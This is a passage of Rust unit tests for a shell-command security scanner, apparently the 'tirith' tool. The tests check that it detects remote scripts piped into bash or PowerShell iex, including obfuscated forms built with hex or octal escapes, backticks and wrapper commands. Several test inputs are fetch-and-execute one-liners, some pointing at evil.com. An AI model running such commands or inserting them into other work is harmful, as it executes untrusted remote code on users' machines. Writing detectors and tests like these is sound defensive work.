2069            r"C:\Users\dev\.cargo\bin\cargo.exe install serde",
2070            ShellType::PowerShell,
2071            Some(cwd),
2072            ScanContext::Exec,
2073        );
2074        assert!(
2075            f1.iter().any(|f| f.rule_id == RuleId::VetNotConfigured),
2076            "should detect cargo.exe with Windows backslash path"
2077        );
2078        let f2 = check(
2079            r"C:\Users\dev\.cargo\bin\CARGO.EXE install serde",
2080            ShellType::PowerShell,
2081            Some(cwd),
2082            ScanContext::Exec,
2083        );
2084        assert!(
2085            f2.iter().any(|f| f.rule_id == RuleId::VetNotConfigured),
2086            "should detect CARGO.EXE case-insensitively"
2087        );
2088    }
2089
2090    // ── normalize_shell_token unit tests ──
2091
2092    #[test]
2093    fn test_normalize_ansi_c_basic() {
2094        assert_eq!(normalize_shell_token("$'bash'", ShellType::Posix), "bash");
2095    }
2096
2097    #[test]
2098    fn test_normalize_ansi_c_hex() {
2099        assert_eq!(
2100            normalize_shell_token("$'\\x62\\x61\\x73\\x68'", ShellType::Posix),
2101            "bash"
2102        );
2103    }
2104
2105    #[test]
2106    fn test_normalize_ansi_c_octal() {
2107        assert_eq!(
2108            normalize_shell_token("$'\\142\\141\\163\\150'", ShellType::Posix),
2109            "bash"
2110        );
2111    }
2112
2113    #[test]
2114    fn test_normalize_ansi_c_octal_leading_zero() {
2115        // \057 = '/' (octal 057 = 47 decimal = '/')
2116        assert_eq!(
2117            normalize_shell_token("$'\\057bin\\057bash'", ShellType::Posix),
2118            "/bin/bash"
2119        );
2120    }
2121
2122    #[test]
2123    fn test_normalize_ansi_c_bare_zero() {
2124        // \0 alone (no following octal digits) should still be NUL
2125        assert_eq!(normalize_shell_token("$'a\\0b'", ShellType::Posix), "a\0b");
2126    }
2127
2128    #[test]
2129    fn test_normalize_ansi_c_unicode() {
2130        assert_eq!(
2131            normalize_shell_token("$'\\u0062ash'", ShellType::Posix),
2132            "bash"
2133        );
2134    }
2135
2136    #[test]
2137    fn test_normalize_double_quotes() {
2138        assert_eq!(normalize_shell_token("\"bash\"", ShellType::Posix), "bash");
2139    }
2140
2141    #[test]
2142    fn test_normalize_single_quotes() {
2143        assert_eq!(normalize_shell_token("'bash'", ShellType::Posix), "bash");
2144    }
2145
2146    #[test]
2147    fn test_normalize_backslash() {
2148        assert_eq!(normalize_shell_token("ba\\sh", ShellType::Posix), "bash");
2149    }
2150
2151    #[test]
2152    fn test_normalize_empty_concat() {
2153        assert_eq!(normalize_shell_token("ba''sh", ShellType::Posix), "bash");
2154    }
2155
2156    #[test]
2157    fn test_normalize_mixed_concat() {
2158        assert_eq!(normalize_shell_token("'ba'sh", ShellType::Posix), "bash");
2159    }
2160
2161    #[test]
2162    fn test_normalize_powershell_backtick() {
2163        assert_eq!(
2164            normalize_shell_token("`i`e`x", ShellType::PowerShell),
2165            "iex"
2166        );
2167    }
2168
2169    #[test]
2170    fn test_normalize_unclosed_single_quote() {
2171        // Unclosed quote: everything after ' is literal, state ends in SINGLE_QUOTE
2172        let result = normalize_shell_token("'bash", ShellType::Posix);
2173        assert_eq!(result, "bash");
2174    }
2175
2176    #[test]
2177    fn test_normalize_unclosed_double_quote() {
2178        let result = normalize_shell_token("\"bash", ShellType::Posix);
2179        assert_eq!(result, "bash");
2180    }
2181
2182    // ── normalize_cmd_base unit tests ──
2183
2184    #[test]
2185    fn test_cmd_base_path() {
2186        assert_eq!(
2187            normalize_cmd_base("/usr/bin/bash", ShellType::Posix),
2188            "bash"
2189        );
2190    }
2191
2192    #[test]
2193    fn test_cmd_base_ansi_c() {
2194        assert_eq!(normalize_cmd_base("$'bash'", ShellType::Posix), "bash");
2195    }
2196
2197    #[test]
2198    fn test_cmd_base_exe() {
2199        assert_eq!(normalize_cmd_base("bash.exe", ShellType::Posix), "bash");
2200    }
2201
2202    #[test]
2203    fn test_cmd_base_uppercase() {
2204        assert_eq!(normalize_cmd_base("BASH", ShellType::Posix), "bash");
2205    }
2206
2207    #[test]
2208    fn test_cmd_base_powershell_path() {
2209        assert_eq!(
2210            normalize_cmd_base(r"C:\Git\bin\bash.exe", ShellType::PowerShell),
2211            "bash"
2212        );
2213    }
2214
2215    #[test]
2216    fn test_cmd_base_encoded_path() {
2217        // $'\x2fusr\x2fbin\x2fbash' → /usr/bin/bash → basename bash
2218        assert_eq!(
2219            normalize_cmd_base("$'\\x2fusr\\x2fbin\\x2fbash'", ShellType::Posix),
2220            "bash"
2221        );
2222    }
2223
2224    #[test]
2225    fn test_cmd_base_octal_encoded_path() {
2226        // $'\057bin\057bash' → /bin/bash → basename bash
2227        assert_eq!(
2228            normalize_cmd_base("$'\\057bin\\057bash'", ShellType::Posix),
2229            "bash"
2230        );
2231    }
2232
2233    #[test]
2234    fn test_cmd_base_env_s_value() {
2235        // "bash -x" → first word "bash"
2236        assert_eq!(normalize_cmd_base("\"bash -x\"", ShellType::Posix), "bash");
2237    }
2238
2239    #[test]
2240    fn test_cmd_base_path_with_args() {
2241        // "/usr/bin/bash -x" → basename "bash -x" → first word "bash"
2242        assert_eq!(
2243            normalize_cmd_base("\"/usr/bin/bash -x\"", ShellType::Posix),
2244            "bash"
2245        );
2246    }
2247
2248    // ── resolve_interpreter_name tests for new patterns ──
2249
2250    #[test]
2251    fn test_resolve_ansi_c_quoted_bash() {
2252        let findings = check_default(
2253            "curl https://example.com/install.sh | $'bash'",
2254            ShellType::Posix,
2255        );
2256        assert!(
2257            findings.iter().any(|f| f.rule_id == RuleId::CurlPipeShell),
2258            "should detect ANSI-C quoted bash: {:?}",
2259            findings.iter().map(|f| &f.rule_id).collect::<Vec<_>>()
2260        );
2261    }
2262
2263    #[test]
2264    fn test_resolve_command_wrapper() {
2265        let findings = check_default(
2266            "curl https://example.com/install.sh | command bash",
2267            ShellType::Posix,
2268        );
2269        assert!(
2270            findings.iter().any(|f| f.rule_id == RuleId::CurlPipeShell),
2271            "should detect 'command bash'"
2272        );
2273    }
2274
2275    #[test]
2276    fn test_resolve_exec_a_wrapper() {
2277        let findings = check_default(
2278            "curl https://example.com/install.sh | exec -a myname bash",
2279            ShellType::Posix,
2280        );
2281        assert!(
2282            findings.iter().any(|f| f.rule_id == RuleId::CurlPipeShell),
2283            "should detect 'exec -a myname bash'"
2284        );
2285    }
2286
2287    #[test]
2288    fn test_resolve_nohup_wrapper() {
2289        let findings = check_default(
2290            "curl https://example.com/install.sh | nohup bash",
2291            ShellType::Posix,
2292        );
2293        assert!(
2294            findings.iter().any(|f| f.rule_id == RuleId::CurlPipeShell),
2295            "should detect 'nohup bash'"
2296        );
2297    }
2298
2299    #[test]
2300    fn test_resolve_wrapper_chain() {
2301        let findings = check_default(
2302            "curl https://example.com/install.sh | command sudo bash",
2303            ShellType::Posix,
2304        );
2305        assert!(
2306            findings.iter().any(|f| f.rule_id == RuleId::CurlPipeShell),
2307            "should detect wrapper chain 'command sudo bash'"
2308        );
2309    }
2310
2311    #[test]
2312    fn test_resolve_case_insensitive() {
2313        let findings = check_default(
2314            "curl https://example.com/install.sh | BASH",
2315            ShellType::Posix,
2316        );
2317        assert!(
2318            findings.iter().any(|f| f.rule_id == RuleId::CurlPipeShell),
2319            "should detect uppercase BASH"
2320        );
2321    }
2322
2323    #[test]
2324    fn test_resolve_powershell_backtick_iex() {
2325        let findings = check_default(
2326            "iwr https://evil.com/script.ps1 | `i`e`x",
2327            ShellType::PowerShell,
2328        );
2329        assert!(
2330            findings
2331                .iter()
2332                .any(|f| f.rule_id == RuleId::PipeToInterpreter),
2333            "should detect PowerShell backtick-escaped iex"
2334        );
2335    }
2336
2337    // --- Remediation hint tests ---
2338
2339    #[test]
2340    fn test_pipe_to_interpreter_hint_with_url() {
2341        let input = "curl https://example.com/install.sh | bash";
2342        let segments = tokenize::tokenize(input, ShellType::Posix);
2343        let mut findings = Vec::new();
2344        check_pipe_to_interpreter(&segments, ShellType::Posix, &mut findings);
2345        assert_eq!(findings.len(), 1);
2346        assert!(
2347            findings[0]
2348                .description
2349                .contains("https://example.com/install.sh"),
2350            "should include extracted URL in hint"
2351        );
2352        assert!(
2353            findings[0].description.contains("getvet.sh"),
2354            "should mention vet"
2355        );
2356        if cfg!(unix) {
2357            assert!(
2358                findings[0].description.contains("tirith run"),
2359                "Unix builds should suggest tirith run"
2360            );
2361        }
2362    }
2363
2364    #[test]
2365    fn test_pipe_to_interpreter_hint_quoted_url() {
2366        let input = r#"curl "https://example.com/install.sh" | bash"#;
2367        let segments = tokenize::tokenize(input, ShellType::Posix);
2368        let mut findings = Vec::new();
2369        check_pipe_to_interpreter(&segments, ShellType::Posix, &mut findings);
2370        assert_eq!(findings.len(), 1);
2371        assert!(
2372            findings[0]
2373                .description
2374                .contains("https://example.com/install.sh"),
2375            "should extract URL from quoted arg"
2376        );
2377    }
2378
2379    #[test]
2380    fn test_pipe_to_interpreter_hint_flag_equals_url() {
2381        let input = "curl --url=https://example.com/install.sh | bash";
2382        let segments = tokenize::tokenize(input, ShellType::Posix);
2383        let mut findings = Vec::new();
2384        check_pipe_to_interpreter(&segments, ShellType::Posix, &mut findings);
2385        assert_eq!(findings.len(), 1);
2386        assert!(
2387            findings[0]
2388                .description
2389                .contains("https://example.com/install.sh"),
2390            "should extract URL from --flag=value"
2391        );
2392    }
2393
2394    #[test]
2395    fn test_pipe_to_interpreter_no_hint_for_cat() {
2396        let input = "cat /tmp/script.sh | bash";
2397        let segments = tokenize::tokenize(input, ShellType::Posix);
2398        let mut findings = Vec::new();
2399        check_pipe_to_interpreter(&segments, ShellType::Posix, &mut findings);
2400        assert_eq!(findings.len(), 1);
2401        assert!(
2402            !findings[0].description.contains("getvet.sh"),
2403            "non-fetch source should NOT get vet hint"
2404        );
2405        assert!(
2406            !findings[0].description.contains("tirith run"),
2407            "non-fetch source should NOT get tirith run hint"
2408        );
2409    }
2410
2411    #[test]
2412    fn test_dashdash_stops_flag_skipping() {
2413        // "command -- -x" should treat -x as the command, not a flag
2414        let input = "curl https://example.com/install.sh | command -- bash";
2415        let segments = tokenize::tokenize(input, ShellType::Posix);
2416        let mut findings = Vec::new();
2417        check_pipe_to_interpreter(&segments, ShellType::Posix, &mut findings);
2418        assert_eq!(findings.len(), 1, "should detect bash after --");
2419    }
2420
2421    #[test]
2422    fn test_sudo_dashdash_resolves_command() {
2423        // "sudo -- bash" should resolve to bash (-- ends sudo's options)
2424        let input = "curl https://example.com/install.sh | sudo -- bash";
2425        let segments = tokenize::tokenize(input, ShellType::Posix);
2426        let mut findings = Vec::new();
2427        check_pipe_to_interpreter(&segments, ShellType::Posix, &mut findings);
2428        assert_eq!(findings.len(), 1, "should detect bash after sudo --");
2429        assert!(
2430            findings[0].description.contains("interpreter 'bash'"),
2431            "should resolve to bash: {}",
2432            findings[0].description
2433        );
2434    }
2435
2436    #[test]
2437    fn test_ansic_quoting_not_applied_to_fish() {
2438        // Fish doesn't support $'...' — it should be treated as literal $
2439        assert_eq!(normalize_shell_token("$'bash'", ShellType::Fish), "$bash");
2440        // But POSIX should strip the $'...' wrapper
2441        assert_eq!(normalize_shell_token("$'bash'", ShellType::Posix), "bash");
2442    }
2443
2444    #[test]
2445    fn test_powershell_doubled_single_quote() {
2446        // PowerShell: '' inside single quotes is an escaped literal '
2447        assert_eq!(
2448            normalize_shell_token("'it''s'", ShellType::PowerShell),
2449            "it's"
2450        );
2451        // POSIX: '' ends and reopens — produces empty join
2452        assert_eq!(normalize_shell_token("'it''s'", ShellType::Posix), "its");
2453    }
2454
2455    #[test]
2456    fn test_sudo_combined_short_flags() {
2457        // sudo -iu root bash: -iu means -i -u, where -u takes "root" as value
2458        let input = "curl https://example.com/install.sh | sudo -iu root bash";
2459        let segments = tokenize::tokenize(input, ShellType::Posix);
2460        let mut findings = Vec::new();
2461        check_pipe_to_interpreter(&segments, ShellType::Posix, &mut findings);
2462        assert_eq!(
2463            findings.len(),
2464            1,
2465            "should detect pipe to bash through sudo -iu root"
2466        );
2467        assert!(
2468            findings[0].description.contains("interpreter 'bash'"),
2469            "should resolve to bash, not root: {}",
2470            findings[0].description
2471        );
2472    }
2473
2474    #[test]
2475    fn test_pipe_to_interpreter_hint_iwr_powershell() {
2476        let input = "iwr https://evil.com/script.ps1 | iex";
2477        let segments = tokenize::tokenize(input, ShellType::PowerShell);
2478        let mut findings = Vec::new();
2479        check_pipe_to_interpreter(&segments, ShellType::PowerShell, &mut findings);
2480        assert_eq!(findings.len(), 1);
2481        assert!(
2482            findings[0].description.contains("getvet.sh"),
2483            "iwr (PowerShell fetch) should get vet hint"
2484        );
2485        assert!(
2486            !findings[0].description.contains("tirith run"),
2487            "PowerShell fetch should NOT suggest tirith run"
2488        );
2489    }
2490
2491    #[test]
2492    fn test_pipe_to_interpreter_hint_sanitizes_ansi_in_url() {
2493        // \x1b[31m is an ANSI "red" escape — must be stripped from hint
2494        let input = "curl https://example.com/\x1b[31mred | bash";
2495        let segments = tokenize::tokenize(input, ShellType::Posix);
2496        let mut findings = Vec::new();
2497        check_pipe_to_interpreter(&segments, ShellType::Posix, &mut findings);
2498        assert_eq!(findings.len(), 1);
2499        assert!(
2500            !findings[0].description.contains('\x1b'),
2501            "ANSI escape must be stripped from hint URL: {}",
2502            findings[0].description
2503        );
2504        assert!(
2505            findings[0]
2506                .description
2507                .contains("https://example.com/[31mred"),
2508            "URL should be present minus the ESC byte: {}",
2509            findings[0].description
2510        );
2511    }
2512
2513    #[test]
2514    fn test_pipe_to_interpreter_hint_sanitizes_newline_in_url() {
2515        // Newline in URL arg could spoof extra output lines
2516        let input = "curl \"https://example.com/\nFAKE: safe\" | bash";
2517        let segments = tokenize::tokenize(input, ShellType::Posix);
2518        let mut findings = Vec::new();
2519        check_pipe_to_interpreter(&segments, ShellType::Posix, &mut findings);
2520        assert_eq!(findings.len(), 1);
2521        // The \n must be stripped — "FAKE" collapses onto the URL, not a separate line
2522        let hint_line = findings[0]
2523            .description
2524            .lines()
2525            .find(|l| l.contains("Safer:"))
2526            .expect("should have hint line");
2527        assert!(
2528            hint_line.contains("example.com/FAKE"),
2529            "newline stripped, FAKE should be part of the URL on the hint line: {hint_line}"
2530        );
2531        // Verify no line starts with "FAKE" (would indicate injection)
2532        assert!(
2533            !findings[0]
2534                .description
2535                .lines()
2536                .any(|l| l.starts_with("FAKE")),
2537            "newline injection must not create a spoofed output line: {}",
2538            findings[0].description
2539        );
2540    }
2541
2542    #[test]
2543    fn test_sanitize_url_for_display() {
2544        assert_eq!(
2545            sanitize_url_for_display("https://ok.com/path"),
2546            "https://ok.com/path"
2547        );
2548        assert_eq!(
2549            sanitize_url_for_display("https://evil.com/\x1b[31mred\x1b[0m"),
2550            "https://evil.com/[31mred[0m"
2551        );
2552        assert_eq!(
2553            sanitize_url_for_display("https://evil.com/\n\rspoof"),
2554            "https://evil.com/spoof"
2555        );
2556        assert_eq!(
2557            sanitize_url_for_display("https://evil.com/\x07bell\x00null"),
2558            "https://evil.com/bellnull"
2559        );
2560    }
2561
2562    #[test]
2563    fn test_source_command_arrays_consistent() {
2564        // is_source_command is composed from the three const arrays.
2565        // Verify all arrays contribute and is_source_command rejects unknowns.
2566        for cmd in POSIX_FETCH_COMMANDS {
2567            assert!(
2568                is_source_command(cmd),
2569                "POSIX_FETCH entry '{cmd}' not recognized"
2570            );
2571            assert!(
2572                is_url_fetch_command(cmd),
2573                "POSIX_FETCH entry '{cmd}' not in fetch union"
2574            );
2575        }
2576        for cmd in POWERSHELL_FETCH_COMMANDS {
2577            assert!(
2578                is_source_command(cmd),
2579                "PS_FETCH entry '{cmd}' not recognized"
2580            );
2581            assert!(
2582                is_url_fetch_command(cmd),
2583                "PS_FETCH entry '{cmd}' not in fetch union"
2584            );
2585        }
2586        for cmd in NON_FETCH_SOURCE_COMMANDS {
2587            assert!(
2588                is_source_command(cmd),
2589                "NON_FETCH entry '{cmd}' not recognized"
2590            );
2591            assert!(
2592                !is_url_fetch_command(cmd),
2593                "NON_FETCH entry '{cmd}' should not be in fetch union"
2594            );
2595        }
2596        assert!(
2597            !is_source_command("cat"),
2598            "cat should not be a source command"
2599        );
2600    }
2601}
tirith_core/rules/command.rs

tirith_core/rules/
command.rs